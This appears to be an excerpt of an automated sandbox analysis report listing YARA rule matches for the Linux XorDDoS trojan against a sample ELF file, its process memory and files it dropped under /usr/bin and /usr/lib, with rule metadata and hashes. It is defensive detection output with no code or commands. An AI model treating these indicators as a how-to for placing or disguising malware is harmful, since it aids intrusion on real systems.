Source: 6388.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6388.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6388.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6388.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6388.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6388.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6371.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6371.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6371.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6371.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6371.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6371.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6380.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6380.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6380.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6380.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6380.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6380.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6248.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6248.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6248.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6248.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6248.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6248.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6246.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6246.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6246.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6246.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6246.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6246.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6298.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6298.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6298.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6298.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6298.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6298.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6383.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6383.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6383.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6383.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6383.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6383.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: Process Memory Space: dptxrnhxmx.elf PID: 6208, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: dptxrnhxmx.elf PID: 6210, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: dptxrnhxmx.elf PID: 6211, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: dptxrnhxmx.elf PID: 6212, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: dptxrnhxmx.elf PID: 6243, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: dptxrnhxmx.elf PID: 6246, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: dptxrnhxmx.elf PID: 6248, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: dptxrnhxmx.elf PID: 6251, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: dptxrnhxmx.elf PID: 6254, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: dptxrnhxmx.elf PID: 6298, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: dptxrnhxmx.elf PID: 6301, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: dptxrnhxmx.elf PID: 6304, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: dptxrnhxmx.elf PID: 6307, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: dptxrnhxmx.elf PID: 6309, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: dptxrnhxmx.elf PID: 6316, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: dptxrnhxmx.elf PID: 6319, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: dptxrnhxmx.elf PID: 6322, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: dptxrnhxmx.elf PID: 6325, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: dptxrnhxmx.elf PID: 6327, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: dptxrnhxmx.elf PID: 6337, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: dptxrnhxmx.elf PID: 6340, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: dptxrnhxmx.elf PID: 6343, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: dptxrnhxmx.elf PID: 6346, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: dptxrnhxmx.elf PID: 6348, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: dptxrnhxmx.elf PID: 6354, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: dptxrnhxmx.elf PID: 6357, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: dptxrnhxmx.elf PID: 6359, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: dptxrnhxmx.elf PID: 6362, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: dptxrnhxmx.elf PID: 6365, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: dptxrnhxmx.elf PID: 6371, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: dptxrnhxmx.elf PID: 6374, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: dptxrnhxmx.elf PID: 6377, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: dptxrnhxmx.elf PID: 6380, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: dptxrnhxmx.elf PID: 6383, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: dptxrnhxmx.elf PID: 6388, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: dptxrnhxmx.elf PID: 6391, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: dptxrnhxmx.elf PID: 6394, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: dptxrnhxmx.elf PID: 6397, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: dptxrnhxmx.elf PID: 6400, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: dptxrnhxmx.elf PID: 6406, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: dptxrnhxmx.elf PID: 6409, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: dptxrnhxmx.elf PID: 6414, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: dptxrnhxmx.elf PID: 6417, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: /usr/bin/qabtuykfdb, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: /usr/bin/qabtuykfdb, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: /usr/bin/qabtuykfdb, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: /usr/bin/qabtuykfdb, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: /usr/bin/qabtuykfdb, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: /usr/bin/qabtuykfdb, type: DROPPED	Matched rule: Rule to detect XOR DDos infection Author: Akamai CSIRT
Source: /usr/bin/qabtuykfdb, type: DROPPED	Matched rule: Detects XORDDoS Author: ditekSHen
Source: /usr/bin/tqdlzqtrvv, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: /usr/bin/tqdlzqtrvv, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: /usr/bin/tqdlzqtrvv, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: /usr/bin/tqdlzqtrvv, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: /usr/bin/tqdlzqtrvv, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: /usr/bin/tqdlzqtrvv, type: DROPPED	Matched rule: Detects XORDDoS Author: ditekSHen
Source: /usr/lib/libudev.so, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: /usr/lib/libudev.so, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: /usr/lib/libudev.so, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: /usr/lib/libudev.so, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: /usr/lib/libudev.so, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: /usr/lib/libudev.so, type: DROPPED	Matched rule: Rule to detect XOR DDos infection Author: Akamai CSIRT
Source: /usr/lib/libudev.so, type: DROPPED	Matched rule: Detects XORDDoS Author: ditekSHen
Source: /usr/bin/rhlqbltizb, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: /usr/bin/rhlqbltizb, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: /usr/bin/rhlqbltizb, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: /usr/bin/rhlqbltizb, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: /usr/bin/rhlqbltizb, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: /usr/bin/rhlqbltizb, type: DROPPED	Matched rule: Rule to detect XOR DDos infection Author: Akamai CSIRT
Source: /usr/bin/rhlqbltizb, type: DROPPED	Matched rule: Detects XORDDoS Author: ditekSHen
Source: /usr/bin/wrvptdarnp, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: /usr/bin/wrvptdarnp, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: /usr/bin/wrvptdarnp, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: /usr/bin/wrvptdarnp, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: /usr/bin/wrvptdarnp, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: /usr/bin/wrvptdarnp, type: DROPPED	Matched rule: Rule to detect XOR DDos infection Author: Akamai CSIRT
Source: /usr/bin/wrvptdarnp, type: DROPPED	Matched rule: Detects XORDDoS Author: ditekSHen
Source: /usr/bin/mntlutgnfs, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: /usr/bin/mntlutgnfs, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: /usr/bin/mntlutgnfs, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: /usr/bin/mntlutgnfs, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: /usr/bin/mntlutgnfs, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: /usr/bin/mntlutgnfs, type: DROPPED	Matched rule: Rule to detect XOR DDos infection Author: Akamai CSIRT
Source: /usr/bin/mntlutgnfs, type: DROPPED	Matched rule: Detects XORDDoS Author: ditekSHen
Source: /usr/bin/scllcnzpeu, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: /usr/bin/scllcnzpeu, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: /usr/bin/scllcnzpeu, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: /usr/bin/scllcnzpeu, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: /usr/bin/scllcnzpeu, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: /usr/bin/scllcnzpeu, type: DROPPED	Matched rule: Rule to detect XOR DDos infection Author: Akamai CSIRT
Source: /usr/bin/scllcnzpeu, type: DROPPED	Matched rule: Detects XORDDoS Author: ditekSHen
Source: /usr/bin/wobaryykiz, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: /usr/bin/wobaryykiz, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: /usr/bin/wobaryykiz, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: /usr/bin/wobaryykiz, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: /usr/bin/wobaryykiz, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: /usr/bin/zfzhrlhjxr, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: /usr/bin/zfzhrlhjxr, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: /usr/bin/zfzhrlhjxr, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: /usr/bin/zfzhrlhjxr, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: /usr/bin/zfzhrlhjxr, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: /usr/bin/wobaryykiz, type: DROPPED	Matched rule: Rule to detect XOR DDos infection Author: Akamai CSIRT
Source: /usr/bin/zfzhrlhjxr, type: DROPPED	Matched rule: Rule to detect XOR DDos infection Author: Akamai CSIRT
Source: /usr/bin/wobaryykiz, type: DROPPED	Matched rule: Detects XORDDoS Author: ditekSHen
Source: /usr/bin/zfzhrlhjxr, type: DROPPED	Matched rule: Detects XORDDoS Author: ditekSHen
Source: /usr/bin/tgdthymawi, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: /usr/bin/tgdthymawi, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: /usr/bin/tgdthymawi, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: /usr/bin/tgdthymawi, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: /usr/bin/tgdthymawi, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: /usr/bin/tgdthymawi, type: DROPPED	Matched rule: Rule to detect XOR DDos infection Author: Akamai CSIRT
Source: /usr/bin/tgdthymawi, type: DROPPED	Matched rule: Detects XORDDoS Author: ditekSHen
Source: /usr/bin/gcfolkfaec, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: /usr/bin/gcfolkfaec, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: /usr/bin/gcfolkfaec, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: /usr/bin/gcfolkfaec, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: /usr/bin/gcfolkfaec, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: /usr/bin/gcfolkfaec, type: DROPPED	Matched rule: Rule to detect XOR DDos infection Author: Akamai CSIRT
Source: /usr/bin/gcfolkfaec, type: DROPPED	Matched rule: Detects XORDDoS Author: ditekSHen
Source: /usr/bin/mbeioyodii, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: /usr/bin/mbeioyodii, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: /usr/bin/mbeioyodii, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: /usr/bin/mbeioyodii, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: /usr/bin/mbeioyodii, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: /usr/bin/mbeioyodii, type: DROPPED	Matched rule: Rule to detect XOR DDos infection Author: Akamai CSIRT
Source: /usr/bin/mbeioyodii, type: DROPPED	Matched rule: Detects XORDDoS Author: ditekSHen
Source: /usr/bin/drdxrfohux, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: /usr/bin/drdxrfohux, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: /usr/bin/drdxrfohux, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: /usr/bin/drdxrfohux, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: /usr/bin/drdxrfohux, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: /usr/bin/drdxrfohux, type: DROPPED	Matched rule: Rule to detect XOR DDos infection Author: Akamai CSIRT
Source: /usr/bin/drdxrfohux, type: DROPPED	Matched rule: Detects XORDDoS Author: ditekSHen
Source: /usr/bin/doxgrgkpoa, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: /usr/bin/doxgrgkpoa, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: /usr/bin/doxgrgkpoa, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: /usr/bin/doxgrgkpoa, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: /usr/bin/doxgrgkpoa, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: /usr/bin/doxgrgkpoa, type: DROPPED	Matched rule: Rule to detect XOR DDos infection Author: Akamai CSIRT
Source: /usr/bin/doxgrgkpoa, type: DROPPED	Matched rule: Detects XORDDoS Author: ditekSHen

Source: dptxrnhxmx.elf, type: SAMPLE	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: dptxrnhxmx.elf, type: SAMPLE	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: dptxrnhxmx.elf, type: SAMPLE	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: dptxrnhxmx.elf, type: SAMPLE	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: dptxrnhxmx.elf, type: SAMPLE	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: dptxrnhxmx.elf, type: SAMPLE	Matched rule: XOR_DDosv1 author = Akamai CSIRT, description = Rule to detect XOR DDos infection
Source: dptxrnhxmx.elf, type: SAMPLE	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6406.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6406.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6406.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6406.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6406.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6406.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6348.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
